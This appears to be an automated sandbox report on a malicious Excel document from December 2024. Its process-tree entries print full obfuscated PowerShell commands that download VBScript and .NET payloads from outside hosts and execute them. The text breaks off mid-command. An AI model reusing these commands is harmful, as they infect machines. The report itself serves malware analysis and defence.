                                                                        Data Ascii: 8HTMX(y!.r/[HJ=?y?ltSG-k?,)=W:TP~+=Uj-VTSI4H&V/s,tnK MCsnk}0i>?3_cFi7AlSxtQMFzxYl``sA#~j9}$j
                                                                        2024-12-12 20:38:52 UTC1378INData Raw: 93 c3 b9 dc ee 49 76 31 34 6a b8 dc 05 11 d7 8b bc 70 f8 b6 92 49 de 46 2e 1e 55 62 e4 a2 90 58 83 c9 1d f8 24 59 b3 de f3 0e 69 7c cd a2 ec 2a 95 51 55 42 c9 fa f5 38 17 95 15 a4 31 a2 aa b2 83 6b 1d 91 c5 d9 b2 7d b2 da 77 31 22 d4 65 b7 b1 50 7d c8 af ee 30 63 51 21 05 4b 02 0d d9 2a 09 e7 ad 1a b1 91 1c 92 aa 00 ad 41 4e e0 3d 8f 1f db 01 89 35 3b c0 20 15 db de f0 6f a9 56 75 76 dc 48 ed bb 8c 08 5b 4a 17 7d f9 ca 88 49 e2 f9 18 1a 03 c4 23 6b 26 3e a2 b2 24 d6 c3 22 14 64 b1 ef ed 88 84 29 76 39 ca bd 12 08 bf cb 00 a4 c2 14 98 d5 83 0e 84 9c 9d 36 a5 e0 63 42 c9 e7 9c 18 e0 82 47 07 2c 14 16 14 d5 f0 ac 0d 24 f1 5d a4 03 18 2f ee 33 6b 47 ad d3 3e 98 4d 26 91 19 99 d9 77 32 b9 ae 9e a2 43 00 33 ca 86 52 de ae 08 03 9c 29 21 94 85 5e 2a b8 e3 eb d7
                                                                        Data Ascii: Iv14jpIF.UbX$Yi|*QUB81k}w1"eP}0cQ!K*AN=5; oVuvH[J}I#k&>$"d)v96cBG,$]/3kG>M&w2C3R)!^*
                                                                        2024-12-12 20:38:52 UTC1378INData Raw: 55 78 17 d8 df cf 2b 2c 4e 80 47 2a b5 05 dd 83 d3 29 55 65 55 65 1b 88 c0 d0 66 49 22 dc ae c1 81 be 17 8e 98 b8 77 8c 15 90 2d 6e ea 32 88 5e 32 40 1b ab 2a 25 32 69 64 0c c3 75 1f cc 74 c0 b4 00 44 43 48 3d 24 9e be d9 57 87 73 82 09 b3 d6 b1 53 aa 77 34 e4 5d 03 47 e5 93 f7 c4 14 49 da 40 2a 7e 3f 96 07 ad 79 e3 61 bd 4e d0 7b e4 95 8a 45 b0 c5 8f c3 02 ba 33 cb 53 00 3b 9c 80 42 b1 3b b9 f9 60 18 ce aa 42 b2 86 1d 2c 76 f9 e3 0e ab 40 03 c5 70 31 00 f6 a4 48 6a fa 1d b8 cc 2f e7 00 a5 a9 94 58 f8 8c 0e 24 5d 61 13 77 6b 03 e1 92 17 af 1f 8b 8b c9 29 b5 49 1f 2c 00 18 b9 2d 6c 4f c7 28 47 15 75 86 08 42 f2 6b 2a c9 e9 3e bc 08 42 03 02 af 44 f7 ba cd 6f 04 d6 47 a2 d4 4a f3 be d5 70 2b 82 6d be 99 8e 14 03 f8 ac e1 01 2b d3 ad 7b d6 07 a4 f1 bd 8b 0a
                                                                        Data Ascii: Ux+,NG*)UeUefI"w-n2^2@*%2idutDCH=$WsSw4]GI@*~?yaN{E3S;B;`B,v@p1Hj/X$]awk)I,-lO(GuBk*>BDoGJp+m+{
                                                                        2024-12-12 20:38:52 UTC1378INData Raw: 20 86 62 6f b7 53 95 e9 c1 c0 bc 8f be be 19 5d c4 8a ed 90 7e 1d 32 39 c0 90 48 37 9c 4d 9c e1 d7 9e 99 6a 5f 2e ef d5 7d 3e 18 10 8a 5d c2 8e a7 8c 69 34 c5 24 56 24 30 0d 46 b1 55 b1 ea 1d 46 31 16 a9 92 68 d9 85 aa 90 6b 01 c1 a3 1f 78 16 c0 03 ea 1c d1 c0 ea a1 47 d4 b2 c6 e2 c0 b3 63 fa e0 66 d4 34 f3 16 51 42 c9 03 28 ac 03 31 65 dc 4f 7f 6c 06 e7 83 7e 99 69 cb 32 f7 6e ff 00 2c 5a 39 4a c0 e9 cd 9e 38 cd 24 4f 37 40 10 47 6c 3a 1f ae 27 36 92 58 80 97 69 00 1b 35 81 30 05 58 83 ca 01 00 f7 cf b2 7e cf b4 a9 3f ec fb 47 a6 9e 36 97 4f a8 fb 42 11 94 77 56 88 29 e7 b7 cf b6 7c 6a 58 19 c8 f2 eb 6d 73 66 8f 39 fa 1b f6 20 88 bf 60 e7 77 65 21 f5 ce 36 b3 71 7b 50 00 47 c4 d0 fa e0 7c f3 ec 86 96 0d 24 df 69 61 de cc 9f 72 5f 4c 4e 18 b2 99 62 23 d4
                                                                        Data Ascii: boS]~29H7Mj_.}>]i4$V$0FUF1hkxGcf4QB(1eOl~i2n,Z9J8$O7@Gl:'6Xi50X~?G6OBwV)|jXmsf9 `we!6q{PG|$iar_LNb#


                                                                        Click to jump to process

                                                                        Click to jump to process

                                                                        Click to dive into process behavior distribution

                                                                        Click to jump to process

                                                                        Target ID:0
                                                                        Start time:15:37:48
                                                                        Start date:12/12/2024
                                                                        Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                        Imagebase:0x13fa50000
                                                                        File size:28'253'536 bytes
                                                                        MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:false

                                                                        Target ID:4
                                                                        Start time:15:38:13
                                                                        Start date:12/12/2024
                                                                        Path:C:\Windows\System32\mshta.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                                        Imagebase:0x13ff00000
                                                                        File size:13'824 bytes
                                                                        MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:5
                                                                        Start time:15:38:19
                                                                        Start date:12/12/2024
                                                                        Path:C:\Windows\System32\cmd.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\system32\cmd.exe" "/C POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"
                                                                        Imagebase:0x49ed0000
                                                                        File size:345'088 bytes
                                                                        MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:7
                                                                        Start time:15:38:19
                                                                        Start date:12/12/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"
                                                                        Imagebase:0x13fec0000
                                                                        File size:443'392 bytes
                                                                        MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate
                                                                        Has exited:true

                                                                        Target ID:9
                                                                        Start time:15:38:22
                                                                        Start date:12/12/2024
                                                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vlwyfswc\vlwyfswc.cmdline"
                                                                        Imagebase:0x13fe60000
                                                                        File size:2'758'280 bytes
                                                                        MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate
                                                                        Has exited:true

                                                                        Target ID:10
                                                                        Start time:15:38:23
                                                                        Start date:12/12/2024
                                                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9ECF.tmp" "c:\Users\user\AppData\Local\Temp\vlwyfswc\CSCD4E4666864B4048A31961A99612757D.TMP"
                                                                        Imagebase:0x13fc60000
                                                                        File size:52'744 bytes
                                                                        MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:12
                                                                        Start time:15:38:29
                                                                        Start date:12/12/2024
                                                                        Path:C:\Windows\System32\wscript.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebeautifulpictueforentirelifekidsgivenme.vbS"
                                                                        Imagebase:0xff3f0000
                                                                        File size:168'960 bytes
                                                                        MD5 hash:045451FA238A75305CC26AC982472367
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:13
                                                                        Start time:15:38:30
                                                                        Start date:12/12/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $verilus = 'JGFwb3N0b2xpY25lc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskdmlicm9tZXRlcnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRzYW5nYXBlbnVtID0gJHZpYnJvbWV0ZXJzLkRvd25sb2FkRGF0YSgkYXBvc3RvbGljbmVzcyk7JGhvcmlzbWFzY29wZSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRzYW5nYXBlbnVtKTskSmFuaW5lID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR0cmlicm9tc2Fsb2wgPSAnPDxCQVNFNjRfRU5EPj4nOyRBcmFicyA9ICRob3Jpc21hc2NvcGUuSW5kZXhPZigkSmFuaW5lKTskcGx1cmlzcGlyYWwgPSAkaG9yaXNtYXNjb3BlLkluZGV4T2YoJHRyaWJyb21zYWxvbCk7JEFyYWJzIC1nZSAwIC1hbmQgJHBsdXJpc3BpcmFsIC1ndCAkQXJhYnM7JEFyYWJzICs9ICRKYW5pbmUuTGVuZ3RoOyRkZWNlcm5tZW50ID0gJHBsdXJpc3BpcmFsIC0gJEFyYWJzOyRhZmlyZSA9ICRob3Jpc21hc2NvcGUuU3Vic3RyaW5nKCRBcmFicywgJGRlY2Vybm1lbnQpOyR1bmRyZXNzZWQgPSAtam9pbiAoJGFmaXJlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRhZmlyZS5MZW5ndGgpXTskR2FzdG9uID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5kcmVzc2VkKTskY3V0aXRlcmVicmEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRHYXN0b24pOyRhbGxhbnRvaWRlYSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRhbGxhbnRvaWRlYS5JbnZva2UoJG51bGwsIEAoJzAvdnlpZEIvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRiaW9ncmFwaGVlcycsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywgJ0Nhc1BvbCcsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnMScsJyRiaW9ncmFwaGVlcycpKTs=';$spinispicule = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($verilus));Invoke-Expression $spinispicule
                                                                        Imagebase:0x13fec0000
                                                                        File size:443'392 bytes
                                                                        MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate
                                                                        Has exited:true

                                                                        Target ID:15
                                                                        Start time:15:38:33
                                                                        Start date:12/12/2024
                                                                        Path:C:\Windows\System32\mshta.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                                        Imagebase:0x13f470000
                                                                        File size:13'824 bytes
                                                                        MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:17
                                                                        Start time:15:38:40
                                                                        Start date:12/12/2024
                                                                        Path:C:\Windows\System32\cmd.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\system32\cmd.exe" "/C POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"
                                                                        Imagebase:0x4a300000
                                                                        File size:345'088 bytes
                                                                        MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:19
                                                                        Start time:15:38:40
                                                                        Start date:12/12/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"
                                                                        Imagebase:0x13fec0000
                                                                        File size:443'392 bytes
                                                                        MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:20
                                                                        Start time:15:38:43
                                                                        Start date:12/12/2024
                                                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5djzgayy\5djzgayy.cmdline"
                                                                        Imagebase:0x13f110000
                                                                        File size:2'758'280 bytes
                                                                        MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:21
                                                                        Start time:15:38:43
                                                                        Start date:12/12/2024
                                                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEC91.tmp" "c:\Users\user\AppData\Local\Temp\5djzgayy\CSC760185DBFBB46BF8363AB3E3456F7D3.TMP"
                                                                        Imagebase:0x13f520000
                                                                        File size:52'744 bytes
                                                                        MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:23
                                                                        Start time:15:38:46
                                                                        Start date:12/12/2024
                                                                        Path:C:\Windows\System32\wscript.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebeautifulpictueforentirelifekidsgivenme.vbS"
                                                                        Imagebase:0xfffd0000
                                                                        File size:168'960 bytes
                                                                        MD5 hash:045451FA238A75305CC26AC982472367
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:24
                                                                        Start time:15:38:47
                                                                        Start date:12/12/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $verilus = 